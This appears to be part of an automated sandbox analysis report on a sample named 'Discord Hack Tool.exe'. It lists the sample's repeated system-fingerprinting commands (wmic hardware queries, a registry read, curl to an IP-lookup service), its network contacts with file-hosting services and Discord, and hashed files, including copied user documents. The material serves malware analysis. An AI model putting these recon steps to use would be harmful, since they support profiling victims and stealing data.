C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

Network

Country Destination Domain Proto
US 8.8.8.8:53 mega.nz udp
LU 31.216.145.5:443 mega.nz tcp
LU 31.216.145.5:443 mega.nz tcp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
NL 66.203.127.11:443 eu.static.mega.co.nz tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 gfs214n108.userstorage.mega.co.nz udp
US 8.8.8.8:53 gfs204n118.userstorage.mega.co.nz udp
CA 162.208.16.18:443 gfs302n108.userstorage.mega.co.nz tcp
CA 162.208.16.18:443 gfs302n108.userstorage.mega.co.nz tcp
CA 162.208.16.18:443 gfs302n108.userstorage.mega.co.nz tcp
CA 162.208.16.18:443 gfs302n108.userstorage.mega.co.nz tcp
FR 185.206.26.18:443 gfs208n108.userstorage.mega.co.nz tcp
FR 185.206.26.18:443 gfs208n108.userstorage.mega.co.nz tcp
FR 185.206.26.18:443 gfs208n108.userstorage.mega.co.nz tcp
FR 185.206.26.18:443 gfs208n108.userstorage.mega.co.nz tcp
LU 89.44.168.102:443 gfs270n386.userstorage.mega.co.nz tcp
LU 89.44.168.102:443 gfs270n386.userstorage.mega.co.nz tcp
LU 89.44.168.102:443 gfs270n386.userstorage.mega.co.nz tcp
LU 89.44.168.102:443 gfs270n386.userstorage.mega.co.nz tcp
NL 185.206.24.26:443 gfs204n118.userstorage.mega.co.nz tcp
NL 185.206.24.26:443 gfs204n118.userstorage.mega.co.nz tcp
NL 185.206.24.26:443 gfs204n118.userstorage.mega.co.nz tcp
NL 185.206.24.26:443 gfs204n118.userstorage.mega.co.nz tcp
DE 94.24.36.10:443 gfs262n300.userstorage.mega.co.nz tcp
DE 94.24.36.10:443 gfs262n300.userstorage.mega.co.nz tcp
DE 94.24.36.10:443 gfs262n300.userstorage.mega.co.nz tcp
DE 94.24.36.10:443 gfs262n300.userstorage.mega.co.nz tcp
ES 185.206.27.18:443 gfs214n108.userstorage.mega.co.nz tcp
ES 185.206.27.18:443 gfs214n108.userstorage.mega.co.nz tcp
ES 185.206.27.18:443 gfs214n108.userstorage.mega.co.nz tcp
ES 185.206.27.18:443 gfs214n108.userstorage.mega.co.nz tcp
GB 104.86.110.114:443 tcp
GB 92.123.128.147:443 r.bing.com tcp
GB 92.123.128.147:443 r.bing.com tcp
GB 92.123.128.147:443 r.bing.com tcp
GB 92.123.128.147:443 r.bing.com tcp
GB 92.123.128.147:443 r.bing.com tcp
GB 92.123.128.147:443 r.bing.com tcp
GB 92.123.128.177:443 www.bing.com tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50165 tcp
US 162.159.128.233:443 discord.com tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
DE 49.13.193.134:443 api.filedoge.com tcp
US 104.26.13.205:80 api.ipify.org tcp
GB 2.23.210.75:80 r11.o.lencr.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50299 tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50322 tcp
N/A 127.0.0.1:50338 tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50358 tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50409 tcp
N/A 127.0.0.1:50435 tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50466 tcp
N/A 127.0.0.1:50486 tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50506 tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50526 tcp
N/A 127.0.0.1:50546 tcp
N/A 127.0.0.1:50566 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c03d23a8155753f5a936bd7195e475bc
SHA1 cdf47f410a3ec000e84be83a3216b54331679d63
SHA256 6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca
SHA512 6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41

\??\pipe\LOCAL\crashpad_5728_MPZHZISPTKOBXOGA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3d68c7edc2a288ee58e6629398bb9f7c
SHA1 6c1909dea9321c55cae38b8f16bd9d67822e2e51
SHA256 dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b
SHA512 0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 10dc4966174406dddc5b7c9ab126e3d0
SHA1 dc56fcf80f1210d8c16a627d44b898b46cb0276d
SHA256 9d2eaf920bf43ae76a60b592fe1c43ce2a7227da81d7abacd5b911411697ff3c
SHA512 475aecd04693a7b092a249927a0d3af8546b3899178840ee7d0c274ffeef2a0a606b08961e9a54cc72415bc64baa459cb61449bd9cdd562480870c79fbbda13d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 dbd1aad6d652564c7830c6626f1b6080
SHA1 8c9ccf14c3bfbd44d0b909be402335b4dbb352cd
SHA256 33a9ff3877f023b0e5da451618d626411d2074459664723a8300d3cb652cf8a9
SHA512 741a0078ea13278ef824ff0cf3dbc29710b62d62e03f24c2fb56d012e70841dbc160adea67b59c42a8b166b328382a02f4762218d3caf8828f9894ff05e9a025

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 edf652416963e9d3d453d6ae71bd5392
SHA1 1c7ec3b2337702982aa4b78c1540375b30872f87
SHA256 e219782a26857d10dd1bf8dab839bf450b9710d3c595c34b62e1e1d2ad3e2e30
SHA512 53263046ff591f060ffbaf49171ed80e603b31ec51e27c46712587e662e97dd74413b7910e17b98bbb4ad94f5823f84c5ef71964a1a90bd00f47f21767d7c422

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 9557077999376925a9bb6588f8fd6a36
SHA1 ecac4387731e9cdb4abe3a4fc9f4239e2669f479
SHA256 69a4ac05e9a73d7b8dd6b96940ae4b15fb3b29a22b0ee1076be3c8e36f204213
SHA512 8a01cffc86e10d7e788943c517738db86dca67bba4ead7bf67d54ecc3e75bf3627be292e667a5681904ba44313ef6c21b5784cf93abd9b15077f71376b0f87e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 6b6e0bf89c9e3ca1d5c3f4619fed5d2c
SHA1 7754f5273776df71f3a0703242c4508c5c8ca644
SHA256 3bb77cd2e8773a06cad6f954efa3da136ee8372dc83ca803ca91b120821a480e
SHA512 590e26c198884bd69e755349e84c7f2dd203b5c81564b417f7c3a1bc99cc0c6a8f3501be00985e34070e40cadaa0ce565a06e5ddaef354c1a266e5a65ea55f51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe580470.TMP

MD5 93f0328d107d88d63120c842f21c1510
SHA1 920eee8930456daa717510b018197447ce241894
SHA256 b7b9533b58869da8a9d5dd9df133aa3273d3545336359cd6adc98844104b4262
SHA512 b50a174f702541eb2671d4f1fd99832fc047a66617d1b6d139f6541136de047f985a12d0133208bb1350f9a1d90333bd2754b5066bb8d238b3d697ae15398399

C:\Users\Admin\Downloads\Discord Hack Tool.exe

MD5 7a89d2544714e445682d828b0f729b5f
SHA1 4c55c66ca16b17959a872d7179f0476f1622c9ec
SHA256 636f647539bf6dc083ae7a41b5e9cb19337046e2297c289760a104452d5a7255
SHA512 ce5d655254a7b605024cb3d3fa9a3ad2459174f4fe11d92637ccc3633ba7aeb3a471cb15d6d21dcda7c3fad5bc263c064fcbd9514c26fbd9a0d8c517036758d0

C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier

MD5 fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1 d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256 eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512 aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c09ea00fed4bf0520c59cdba5e654e69
SHA1 ae8420c460678f8b8472207d21fb5cc961257ca7
SHA256 b16c51ad6922572aa76285a7eb85f9e87cc630a1edee0bd212d1df03e5a59f8e
SHA512 77067c62ce93bc4043f69543ba408094c8580236fe57d7b696fea139b6e490f4c81c5def873d507abed132983cbf6df9d47d732a872b3f3c2359052ff8c3de48

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\777e9ec9-7c93-4570-a59a-3af16089ec03.down_data

MD5 5683c0028832cae4ef93ca39c8ac5029
SHA1 248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512 aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

C:\Users\Admin\Downloads\temp.ps1

MD5 18047e197c6820559730d01035b2955a
SHA1 277179be54bba04c0863aebd496f53b129d47464
SHA256 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA512 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1jesll45.luv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5488-307-0x0000025B74290000-0x0000025B742B2000-memory.dmp

memory/5488-308-0x0000025B74330000-0x0000025B74376000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.cmdline

MD5 38ed05083dcdf855ba993fc676307315
SHA1 94994ce1619ba3a42d435fd2fb68e20551acdb74
SHA256 381fad8c2f64c9cb68b761f0210140a0d0c5ed19242bd3a7d412d46546240925
SHA512 87bd817186f14db7d851de2e262c8d1f8f5734a205a53dae1cafd3b5c3595c5a9a5b616c4a9289defacabd194354c7e5bcdf1a0c97a678d252300c7ff0ee6718

\??\c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.0.cs

MD5 7bc8de6ac8041186ed68c07205656943
SHA1 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

\??\c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\CSCFE21C5C5317A4A3B81B3616149D2A28F.TMP

MD5 1256b9757e08db9a24ff8b1c3bde0bd9
SHA1 a26f125c0b7d7e94579a5a3ffa05e6febbcdd436
SHA256 e24a132e835a7972aab67fee93dd77197de84ca59dd35d43598f26f25b8f49da
SHA512 df18bebb3a6bf88bf0f57a7ac419512505c04d7792937ff899cb979815248d4db7f459ba291ef63426a0cca17f5568a5ea688c5019259d55be85c6d0ecd6572b

C:\Users\Admin\AppData\Local\Temp\RES5743.tmp

MD5 24bf20c7da8cda980e104cecea6e811a
SHA1 895b1ca9530597ec5671231aa2c69411b1e1d215
SHA256 46d6cc7946062bc84acc79c7a6473afe6d4c6a0eb1db34c68f37ed873540013e
SHA512 e267f8d782358d776ab4dad6c31d6fcdc7b39681443b3bb6da63977e6a8b2936fb441c4e4113eb2f34037bb779e17bb39593cf24a48cfb9a8ae02f0bb6cdbd95

C:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.dll

MD5 dc68c71403fb35455f2ec8757d03d299
SHA1 3a14f8d4a0cefe2d3bfa9073ba7822dac2053c9d
SHA256 411bf004570ba42d74e01fc3d10aa79f095f5cdc6934b2f63082f56e0c70c679
SHA512 2e520e5cb7584eff73c4e648dfb744f7dec3b31b40054c7470d4f310bb37553ba45fe33f954cfda0f16b4c6143e575477d44d25a005b8e18b8c14f0f2bdac680

memory/5488-321-0x0000025B74300000-0x0000025B74308000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

memory/1004-336-0x000001C576CD0000-0x000001C576D20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6cc0a34d75380a039c8a2d2821e13e86
SHA1 3880cdef9421ad3ec32c463585fe3898ce9d5ade
SHA256 8942db45f7c5cf6be3abc9fe503a8bc485a720bb7a5838e6aebeb80f25f691d0
SHA512 eb91b7fb2b9c68078715b1512a2105f3d92123cef1cf2bb6e9fff63c714363c521b4cb840354f2d9f3792a088b9cc623b69514f48096e919a552837a21b47fb1

C:\Users\Admin\AppData\Local\Temp\a92ba44b56b77ce4f21f36ab78a2afeaEtZwIu\DisconnectBackup.docx

MD5 9c3beaa0d2614d9e6cc74cd8aa3fc742
SHA1 90f499d74fd2112409ef441bbd2da4950971d31e
SHA256 e87b22799b18f247b0a89b49a120f4b22ee522458079c3cd0a898121acb14760
SHA512 73a31e91034f46633aa9324bad7434962f88c890345f69a3032fa90327c35dbb706193e9d5e78f894ec7d08f2c798628ed2116f768b2949de1e53472d988d049

C:\Users\Admin\AppData\Local\Temp\a92ba44b56b77ce4f21f36ab78a2afeaEtZwIu\MeasureBackup.pdf

MD5 f2b1aed721fe827e3486af4471ed7d0a
SHA1 216876197d4da080eff1f842871f36235ea31c59
SHA256 fa096644e58f08983dc2a0f52852cbebcda052d74a7d2595c4531b0a4c86ffb3
